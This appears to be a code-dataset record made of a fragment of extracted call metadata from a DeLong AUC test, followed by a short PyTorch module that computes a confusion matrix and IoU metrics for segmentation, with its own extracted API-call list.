] | [((758, 830), 'compare_auc_delong_xu.delong_roc_variance', 'compare_auc_delong_xu.delong_roc_variance', (['self.y_test', 'self.predictions'], {}), '(self.y_test, self.predictions)\n', (799, 830), False, 'import compare_auc_delong_xu\n'), ((839, 891), 'numpy.testing.assert_allclose', 'numpy.testing.assert_allclose', (['self.sklearn_auc', 'auc'], {}), '(self.sklearn_auc, auc)\n', (868, 891), False, 'import numpy\n'), ((900, 962), 'numpy.testing.assert_allclose', 'numpy.testing.assert_allclose', (['(0.0015359814789736538)', 'variance'], {}), '(0.0015359814789736538, variance)\n', (929, 962), False, 'import numpy\n'), ((1203, 1224), 'numpy.empty', 'numpy.empty', (['n_trials'], {}), '(n_trials)\n', (1214, 1224), False, 'import numpy\n'), ((1245, 1266), 'numpy.empty', 'numpy.empty', (['n_trials'], {}), '(n_trials)\n', (1256, 1266), False, 'import numpy\n'), ((1275, 1301), 'numpy.random.seed', 'numpy.random.seed', (['(1234235)'], {}), '(1234235)\n', (1292, 1301), False, 'import numpy\n'), ((1687, 1744), 'compare_auc_delong_xu.delong_roc_variance', 'compare_auc_delong_xu.delong_roc_variance', (['labels', 'scores'], {}), '(labels, scores)\n', (1728, 1744), False, 'import compare_auc_delong_xu\n'), ((1774, 1828), 'numpy.testing.assert_allclose', 'numpy.testing.assert_allclose', (['aucs[trial]', 'auc_delong'], {}), '(aucs[trial], auc_delong)\n', (1803, 1828), False, 'import numpy\n'), ((1338, 1363), 'numpy.ones', 'numpy.ones', (['sample_size_x'], {}), '(sample_size_x)\n', (1348, 1363), False, 'import numpy\n'), ((1365, 1391), 'numpy.zeros', 'numpy.zeros', (['sample_size_y'], {}), '(sample_size_y)\n', (1376, 1391), False, 'import numpy\n')] |
import torch
def confusion_matrix(preds, labels, num_classes):
hist = (
torch.bincount(
num_classes * labels + preds,
minlength=num_classes ** 2,
)
.reshape(num_classes, num_classes)
.float()
)
return hist
def compute_IoU_from_cmatrix(hist, ignore_index=None):
"""Computes the Intersection over Union (IoU).
Args:
hist: confusion matrix.
Returns:
m_IoU, fw_IoU, and matrix IoU
"""
if ignore_index is not None:
hist[ignore_index] = 0.0
intersection = torch.diag(hist)
union = hist.sum(dim=1) + hist.sum(dim=0) - intersection
IoU = intersection.float() / union.float()
IoU[union == 0] = 1.0
if ignore_index is not None:
IoU = torch.cat((IoU[:ignore_index], IoU[ignore_index+1:]))
m_IoU = torch.mean(IoU).item()
fw_IoU = (
torch.sum(intersection) / (2 * torch.sum(hist) - torch.sum(intersection))
).item()
return m_IoU, fw_IoU, IoU
def compute_IoU(preds, labels, num_classes, ignore_index=None):
"""Computes the Intersection over Union (IoU)."""
hist = confusion_matrix(preds, labels, num_classes)
return compute_IoU_from_cmatrix(hist, ignore_index)
| [
"torch.bincount",
"torch.mean",
"torch.sum",
"torch.diag",
"torch.cat"
] | [((570, 586), 'torch.diag', 'torch.diag', (['hist'], {}), '(hist)\n', (580, 586), False, 'import torch\n'), ((768, 823), 'torch.cat', 'torch.cat', (['(IoU[:ignore_index], IoU[ignore_index + 1:])'], {}), '((IoU[:ignore_index], IoU[ignore_index + 1:]))\n', (777, 823), False, 'import torch\n'), ((834, 849), 'torch.mean', 'torch.mean', (['IoU'], {}), '(IoU)\n', (844, 849), False, 'import torch\n'), ((880, 903), 'torch.sum', 'torch.sum', (['intersection'], {}), '(intersection)\n', (889, 903), False, 'import torch\n'), ((86, 158), 'torch.bincount', 'torch.bincount', (['(num_classes * labels + preds)'], {'minlength': '(num_classes ** 2)'}), '(num_classes * labels + preds, minlength=num_classes ** 2)\n', (100, 158), False, 'import torch\n'), ((929, 952), 'torch.sum', 'torch.sum', (['intersection'], {}), '(intersection)\n', (938, 952), False, 'import torch\n'), ((911, 926), 'torch.sum', 'torch.sum', (['hist'], {}), '(hist)\n', (920, 926), False, 'import torch\n')] |